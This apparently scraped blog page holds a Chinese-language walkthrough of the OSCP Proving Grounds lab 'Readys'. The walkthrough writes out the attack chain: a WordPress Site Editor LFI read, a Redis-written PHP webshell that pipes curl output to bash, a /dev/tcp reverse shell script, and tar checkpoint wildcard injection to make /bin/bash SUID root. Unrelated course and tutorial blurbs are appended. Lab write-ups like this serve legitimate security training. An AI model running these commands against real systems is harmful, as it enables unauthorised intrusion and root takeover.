OSCP - Proving Grounds - Readys

主要知识点:

  • Wpscan
  • Redis+本地文件包含 创建reverse shell
  • tar 命令提权
  • redis路径知识

具体步骤

Execute nmap -p- -sV -A #remote_ip#

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 23:00 UTC
Nmap scan report for #remote_ip#
Host is up (0.00053s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.7.2
|_http-title: Readys – Just another WordPress site
6379/tcp open  redis   Redis key-value store

发现值得注意的地方:

  • 80端口开放,安装了wordpress
  • 6379端口开放,安装了redis

执行wpscan,如果本地使用了代理,则需要添加--proxy参数,指定 --plugins-detection 模式,为了得到更准确的插件列表

wpscan --url http://#remote_ip#/ --api-token #api_key# --proxy socks5://#proxy_ip# -e --plugins-detection  aggressive

发现 site-editor 1.1.1插件具有LFI vulnerability

[+] site-editor
 | Location: http://192.168.210.166/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 | Readme: http://192.168.210.166/wp-content/plugins/site-editor/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.210.166/wp-content/plugins/site-editor/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - https://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.210.166/wp-content/plugins/site-editor/readme.txt

Google相关CVE-2018-7422 poc, 得知 调用一下url,可以利用vulnerability

http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

将/etc/passwd替换成 /var/www/html/wp-config.php ,/etc/shadow,/home/alice/.ssh/id_rsa等文件,全部失败,暂时放弃

将注意力放在redis上,尝试不同config文件路径,最终发现 /etc/redis/redis.conf可以被读取,并得到redis 密码

利用redis-cli连接对应redis server,加上slaveof no one避免修改记录时报READONLY相关错误

redis-cli -h #remote_ip# -p 6379 -a "Ready4Redis?" slaveof no one
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
                                                                                                                                                                                                                                           
redis-cli -h #remote_ip# -p 6379                                 
192.168.241.166:6379> 

在redis-cli中尝试对/var/www/html等路径进行set,save操作时,发现报错,需要寻找有其他有权限写入的路径,尝试继续利用LFI漏洞读取 更多的文件,发现 /etc/systemd/system/redis.service 中redis具备写权限的路径为/opt/redis-files/

尝试建立reverse shell,尝试多种方式后,下面的代码成功创建了reverse shell

  • 在本地创建poc.sh
#!/bin/bash

/bin/bash -i >& /dev/tcp/#local_ip#/9000 0>&1
  • nc命令监听9000端口
nc -nlvp 9000
  • 启动python server
python -m http.server 80
  • 利用redis-cli创建reverse shell,它会调用local machine的python 服务器,拿回poc.sh并执行
#remote_ip#:6379> config set dir /opt/redis-files
OK
#remote_ip#:6379> config set dbfilename test.php
OK
#remote_ip#:6379> set test "<?php system('curl #local_ip#/poc.sh | bash'); ?>"
OK
#remote_ip#:6379> save
OK
192.168.241.166:6379> 
  • 在浏览器端访问如下地址,触发reverse shell
http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php

将linpeas.sh上传到remote server,并执行,发现如下shell利用了tar命令来定期备份/var/www/html路径下的文件

*/3 * * * * root /usr/local/bin/backup.sh
-rwxr-xr-x 1 root root 122 Nov 17  2021 /usr/local/bin/backup.sh   
#!/bin/bash

cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi

尝试利用tar命令检查点功能 在备份的时候外挂自定义命令

在/var/www/html路径下执行如下命令,当tar命令被用于备份/var/www/html路径下文件时,exploit.sh会被执行,赋予/bin/bash suid的权限

echo "chmod +s /bin/bash" >exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"

等几分钟后,执行 root权限获取到

alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
alice@readys: /bin/bash -p
/bin/bash -p
id
uid=1000(alice) gid=1000(alice) euid=0(root) egid=0(root) groups=0(root),1000(alice)
ls /root 
proof.txt
cat /root/proof.txt
892f38a3df377fc50592924a41f10f64


 

6/2025 MP4 出版 |视频: h264, 1280x720 |音频:AAC,44.1 KHz,2 Ch 语言:英语 |持续时间:12h 3m |大小: 4.5 GB 通过实际 NLP 项目学习文本预处理、矢量化、神经网络、CNN、RNN 和深度学习 学习内容 学习核心 NLP 任务,如词汇切分、词干提取、词形还原、POS 标记和实体识别,以实现有效的文本预处理。 使用 One-Hot、TF-IDF、BOW、N-grams 和 Word2Vec 将文本转换为向量,用于 ML 和 DL 模型。 了解并实施神经网络,包括感知器、ANN 和数学反向传播。 掌握深度学习概念,如激活函数、损失函数和优化技术,如 SGD 和 Adam 使用 CNN 和 RNN 构建 NLP 和计算机视觉模型,以及真实数据集和端到端工作流程 岗位要求 基本的 Python 编程知识——包括变量、函数和循环,以及 NLP 和 DL 实现 熟悉高中数学——尤其是线性代数、概率和函数,用于理解神经网络和反向传播。 对 AI、ML 或数据科学感兴趣 – 不需要 NLP 或深度学习方面的经验;概念是从头开始教授的 描述 本课程专为渴望深入了解自然语言处理 (NLP) 和深度学习的激动人心的世界的人而设计,这是人工智能行业中增长最快和需求最旺盛的两个领域。无论您是学生、希望提升技能的在职专业人士,还是有抱负的数据科学家,本课程都能为您提供必要的工具和知识,以了解机器如何阅读、解释和学习人类语言。我们从 NLP 的基础开始,从头开始使用文本预处理技术,例如分词化、词干提取、词形还原、停用词删除、POS 标记和命名实体识别。这些技术对于准备非结构化文本数据至关重要,并用于聊天机器人、翻译器和推荐引擎等实际 AI 应用程序。接下来,您将学习如何使用 Bag of Words、TF-IDF、One-Hot E
内容概要:本文全面介绍了虚幻引擎4(UE4)的功能、应用场景、学习准备、基础操作、蓝图系统、材质与纹理、灯光与渲染等方面的内容。UE4是一款由Epic Games开发的强大游戏引擎,支持跨平台开发,广泛应用于游戏、虚拟现实、增强现实、建筑设计等领域。文章详细阐述了学习UE4前的硬件和软件准备,包括最低和推荐配置,以及Epic Games账户创建、启动器安装等步骤。接着介绍了UE4的界面组成和基本操作,如视口、内容浏览器、细节面板等。蓝图系统作为UE4的可视化脚本工具,极大降低了编程门槛,通过实例演练展示了蓝图的应用。材质与纹理部分讲解了材质编辑器的使用和纹理导入设置,灯光与渲染部分介绍了不同类型的灯光及其应用,以及后期处理和高质量图片渲染的方法。最后推荐了一些学习资源,包括官方文档、教程网站、论坛社区和书籍。 适合人群:对游戏开发感兴趣、希望学习UE4的初学者和有一定编程基础的研发人员。 使用场景及目标:①掌握UE4的基本操作和界面认知,为后续深入学习打下基础;②通过蓝图系统快速创建游戏逻辑,降低编程门槛;③学会材质与纹理的创建和设置,提升游戏画面的真实感;④掌握灯光与渲染技术,营造逼真的游戏氛围;⑤利用推荐的学习资源,加速UE4的学习进程。 阅读建议:本文内容详尽,涵盖了UE4的各个方面,建议读者按照章节顺序逐步学习,先从基础操作入手,再深入到蓝图、材质、灯光等高级功能。在学习过程中,结合实际项目进行练习,遇到问题时参考官方文档或社区论坛,不断积累经验和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值